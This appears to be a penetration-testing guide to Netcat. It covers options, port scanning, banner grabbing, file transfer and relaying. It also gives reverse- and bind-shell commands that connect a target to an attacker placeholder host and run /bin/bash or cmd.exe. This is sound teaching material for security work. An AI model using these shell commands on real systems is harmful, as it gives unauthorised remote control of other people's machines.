# Netcat

#### Netcat

**Netcat (nc)** is a versatile networking tool often referred to as the "Swiss Army knife" of networking. It can read and write data across network connections using the TCP/IP protocol. It is commonly used in penetration testing for various purposes, including banner grabbing, port scanning, and creating reverse or bind shells.

#### Uses of Netcat in Penetration Testing

1. **Port Scanning**
2. **Banner Grabbing**
3. **Transferring Files**
4. **Creating Reverse Shells**
5. **Creating Bind Shells**
6. **Listening for Connections**
7. **Relaying Traffic**

#### Reverse Shell and Bind Shell

* **Reverse Shell**: The target machine connects back to the attacker's machine. This is useful when the target machine is behind a firewall or NAT.
* **Bind Shell**: The target machine opens a listening port, and the attacker connects to this port. This is useful when the target machine has a publicly accessible IP address.

#### Netcat Options and Usage

**Basic Netcat Options**

* `-l`: Listen mode, for inbound connections.
* `-p`: Local port number.
* `-e`: Program to execute after connection is established.
* `-v`: Verbose mode.
* `-z`: Zero-I/O mode, for scanning.
* `-n`: Numeric-only IP addresses, no DNS.
* `-w`: Timeout for connects and final net reads.
* `-u`: UDP mode.
* `-k`: Keep inbound sockets open for multiple connections.
* `-c`: Send CRLF as line-ending.

**Common Netcat Use Cases**

1. **Port Scanning**

```sh
nc -zv <target_ip> 1-1000
```

* `-z`: Zero-I/O mode.
* `-v`: Verbose mode.
* `<target_ip>`: Target IP address.
* `1-1000`: Port range to scan.

2. **Banner Grabbing**

```sh
nc -v <target_ip> <port>
```

* `-v`: Verbose mode.
* `<target_ip>`: Target IP address.
* `<port>`: Target port (e.g., 80 for HTTP).

3. **Transferring Files**

**Sender:**

```sh
nc -l -p <port> < file_to_send
```

* `-l`: Listen mode.
* `-p`: Local port.

**Receiver:**

```sh
nc <sender_ip> <port> > received_file
```

4. **Creating a Reverse Shell**

**On the Attacker’s Machine:**

```sh
nc -l -p <port>
```

**On the Target Machine:**

```sh
nc <attacker_ip> <port> -e /bin/bash
```

* `-e`: Program to execute (e.g., /bin/bash for Linux).

5. **Creating a Bind Shell**

**On the Target Machine:**

```sh
nc -l -p <port> -e /bin/bash
```

**On the Attacker’s Machine:**

```sh
nc <target_ip> <port>
```

6. **Listening for Connections**

```sh
nc -l -p <port>
```

7. **Relaying Traffic**

```sh
nc -l -p <local_port> | nc <remote_ip> <remote_port>
```

#### Detailed Examples

**Example: Reverse Shell on Linux**

**Attacker’s Machine:**

```sh
nc -lvp 4444
```

**Target Machine:**

```sh
nc <attacker_ip> 4444 -e /bin/bash
```

**Example: Bind Shell on Windows**

**Target Machine:**

```sh
nc -lvp 4444 -e cmd.exe
```

**Attacker’s Machine:**

```sh
nc <target_ip> 4444
```

**Example: File Transfer**

**Send a File:**

**Sender:**

```sh
nc -l -p 4444 < file.txt
```

**Receiver:**

```sh
nc <sender_ip> 4444 > file.txt
```

#### References

1. **Netcat Documentation**: [Netcat Guide](https://nc110.sourceforge.io/)
2. **Penetration Testing with Netcat**: [Penetration Testing Lab](https://pentestlab.blog/2012/12/12/netcat-the-swiss-army-knife/)
3. **Reverse Shells and Bind Shells**: [Reverse Shell Cheatsheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/)

By mastering Netcat, penetration testers can effectively perform a variety of network tasks, enhance their toolkit, and better understand network vulnerabilities and potential attack vectors.